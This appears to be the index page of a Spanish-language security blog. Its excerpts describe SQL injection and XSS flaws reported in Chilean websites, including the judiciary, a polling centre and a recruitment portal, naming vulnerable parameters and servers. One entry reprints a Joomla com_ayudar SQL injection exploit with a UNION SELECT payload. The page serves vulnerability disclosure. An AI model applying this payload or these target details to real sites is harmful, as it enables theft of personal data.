Todo partió con la Ley de Inscripción Automática y Voto Voluntario del gobierno chileno. Después vino el buscador del sitio web del SERVEL, en el cual simplemente ingresando un RUN, se podía obtener información personal de los votantes. Respecto al tema y para no alargarme, mejor echar una miradita aquí.
Al instante se habló de vulnerabilidades en el sistema. Debido a eso y Continuar leyendo "13 Millones de Chilenos y el SERVEL"
El día Miércoles 27 de Junio, fue reportado a través del SECURITY OFFICER un par de vulnerabilidades que afectaban a su servidor. Después de 41 días me he podido dar cuenta que las vulnerabilidades fueron mitigadas, quizás no de la mejor manera, debido a que al tratar de explotar el bug, la pagina nos redirecciona al Home mediante un codigo 302 (Movido temporalmente). Lo bonito y lo importante es que ya no es posible acceder a la base de datos mediante inyecciones de codigo SQL a traves de la URL. Continuar leyendo "XSS e Inyecciones SQL en el sitio web de Celulosa Arauco y Constitución"
Simplemente regex.larsolavtorvik.com.
Mas que todo, una ayuda-memoria al momento de instalar este servicio que es uno de mis hobby.
Primero agregamos el grupo “ircd” y posteriormente el usuario con el mismo nombre, sin shell, como home definimos el path donde instalaremos el Unreal y lo agregamos al grupo creado. Continuar leyendo "UnrealIRC + Chroot"
Ha pasado más de un mes desde que se reportó a través de un informe enviado al SUB JEFE DE DEPARTAMENTO DE INFORMÁTICA DE LA CORPORACIÓN ADMINISTRATIVA DEL PODER JUDICIAL, el cual contenía detalles y pruebas de concepto de una vulnerabilidad que afecta al servidor de base de datos Oracle.
Como es de costumbre en la mayoría de las vulnerabilidades del tipo SQLi, no se filtran las variables ingresadas por la URL, por lo que es posible inyectar código SQL Continuar leyendo "Graves inyecciones SQL en el Poder Judicial chileno"
Si, la página web (www.cepchile.cl) de una de las principales entidades encuestadoras y de estudios públicos de Chile es también vulnerable a ataques de Inyección SQL. En este incidente el servidor vulnerable es un PostgreSQL 8.4.1 montado en RedHat.
Este sitio cuenta con un catalogo en el cual se pueden encontrar todas las encuestas y estudios Continuar leyendo "Centro de estudios públicos vulnerable a inyecciones SQL"
Lamentablemente es un sitio Chileno el que usa este componente vulnerable…
…es así:
########################################################### # # # Joomla Component com_ayudar SQL Injection Vulnerability # # # ########################################################### ########################################################### # # # Author : j03h # # https://j03h.com - http://blog.j03h.com # # Name : Joomla com_ayudar # # Type : SQL injection # # # ########################################################### ########################################################### # # # +**+ Example: # # site.com/index.php?option=com_ayudar&view=ayudar&id=47 # # # # +**+ EXPLOIT : # # site.com/index.php?option=com_ayudar&view=ayudar&id=47'+# # union+all+select+database(),user(),3+and+'j'='j # # # ###########################################################
Saludos…
La pagina web (http://www.it-hunter.cl) del portal especializado en buscar profesionales para destacadas empresas en Chile y el extranjero, lamentablemente no filtra los caracteres ingresados a la variable “idoferta” en el archivo “funcionCarga.php”, todo esto mediante el método POST.
A raíz de esta vulnerabilidad es posible inyectar código SQL y obtener la información completa de mas de 2.500 profesionales que postulan a trabajos a través de este sitio. Lo malo de todo esto, es que son datos personales los expuestos y seguramente también el servidor. Continuar leyendo "IT-Hunter expone la información de todos sus postulantes"